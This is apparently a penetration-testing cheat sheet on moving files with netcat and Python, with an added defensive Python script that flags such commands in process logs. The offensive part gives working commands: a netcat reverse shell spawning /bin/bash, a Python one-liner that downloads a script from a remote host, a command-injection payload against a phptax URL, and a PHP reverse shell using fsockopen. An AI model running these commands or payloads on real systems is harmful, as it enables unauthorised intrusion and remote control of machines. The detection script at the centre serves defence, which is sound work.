file-transfers


Sending a file from one machine to another with netcat seems back to front.
It seems odd that the sender machine would be the one listening, since listening implies waiting rather than sending.

In Linux

Linux
###Sender Machine
nc -v -w 40 -p 443 -l < file.php

Linux
###Receiver Machine
nc -v -w 10 192.168.0.100 443 > file.php

Sending from Linux to Windows

We first set up a listener and tell netcat that any incoming data should be written to a file name of our choice, regardless of what the file is.

Linux
###Sender Machine
nc -nv 10.0.0.22 4444 < /usr/bin/wget.exe

Windows
###Receiver Machine
nc -nlvp 4444 > incomingfile.exe


Sending a Reverse Shell - This is when the sending machine gives control of its system to the receiver.

###Sender Machine
nc -nv 10.0.0.22 443 -e /bin/bash

###Receiver Machine
nc -nlvp 443


Using Python like Wget - test it first
python.exe -c "import sys; print(sys.version_info)"

Sender
C:\python26\python.exe -c "import urllib2; u = urllib2.urlopen('http://10.11.0.108:4445/35936.py'); localFile = open('local_file', 'w') ; localFile.write(u.read()); localFile.close()"

Receiver
python -m SimpleHTTPServer 4445
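
A defender's view of the commands above, as an added example that is not part of the original post: a small triage pass over process-creation command lines that flags the netcat and Python invocations shown here. The rule names, the `classify` and `triage` helpers and the sample lines are constructed for illustration.

```python
import re

# Constructed process-creation command lines (e.g. auditd EXECVE or Sysmon
# Event ID 1) mirroring the commands above, plus one benign line. The shell
# consumes "< file" and "> file", so redirections never appear in such logs.
SAMPLE_CMDLINES = [
    "nc -v -w 40 -p 443 -l",
    "nc -nv 10.0.0.22 4444",
    "nc -nv 10.0.0.22 443 -e /bin/bash",
    "nc -nlvp 443",
    'C:\\python26\\python.exe -c "import urllib2; u = urllib2.urlopen(\'http://10.11.0.108:4445/35936.py\')"',
    "python -m SimpleHTTPServer 4445",
    "python manage.py runserver",
]

NC_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat"}
PY_NAME = re.compile(r"^python[\d.]*(\.exe)?$")

def classify(cmdline):
    """Return the sorted rule names that match one command line."""
    tokens = cmdline.split()
    if not tokens:
        return []
    exe = re.split(r"[\\/]", tokens[0].strip('"'))[-1].lower()
    hits = set()
    if exe in NC_NAMES:
        # Short options can be bundled (-nlvp), so collect every flag letter.
        flags = set()
        for tok in tokens[1:]:
            if re.fullmatch(r"-[A-Za-z]+", tok):
                flags.update(tok[1:])
        hits.add("nc_listener" if "l" in flags else "nc_client")
        if "e" in flags:
            hits.add("nc_exec_program")  # socket wired to a program: remote shell
    elif PY_NAME.match(exe):
        if "-c" in tokens and re.search(r"url(open|retrieve)\s*\(", cmdline):
            hits.add("python_inline_download")
        if re.search(r"-m\s+(SimpleHTTPServer|http\.server)\b", cmdline):
            hits.add("python_adhoc_http_server")
    return sorted(hits)

def triage(cmdlines):
    """Map each flagged command line to its rule names; unflagged lines are dropped."""
    return {c: classify(c) for c in cmdlines if classify(c)}

if __name__ == "__main__":
    for cmd, rules in triage(SAMPLE_CMDLINES).items():
        print(", ".join(rules), "<-", cmd)
```

Because the file redirection is invisible in the log, the listener and client rules are the only trace of the file transfers; pairing them with network and file-creation events is what ties a netcat process to the file it wrote.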



Side Note:
If you can't create reverse or bind shells, then try to create a file.
Using this logic we can try to make a file with the PHP information of the system (phpinfo).
Something similar to this:

http://192.168.198.138:8080/phptax/index.php?pfilez=1040d1-pg2.tob;echo "<?php phpinfo() ?>" > a.php;&pdf=make

If we can make files then we can try a simple php shell - remember to escape the "$"

echo "\$sock=fsockopen('192.168.0.100',4444);exec('/bin/sh -i <&3 >&3 2>&3');" > shell4.php
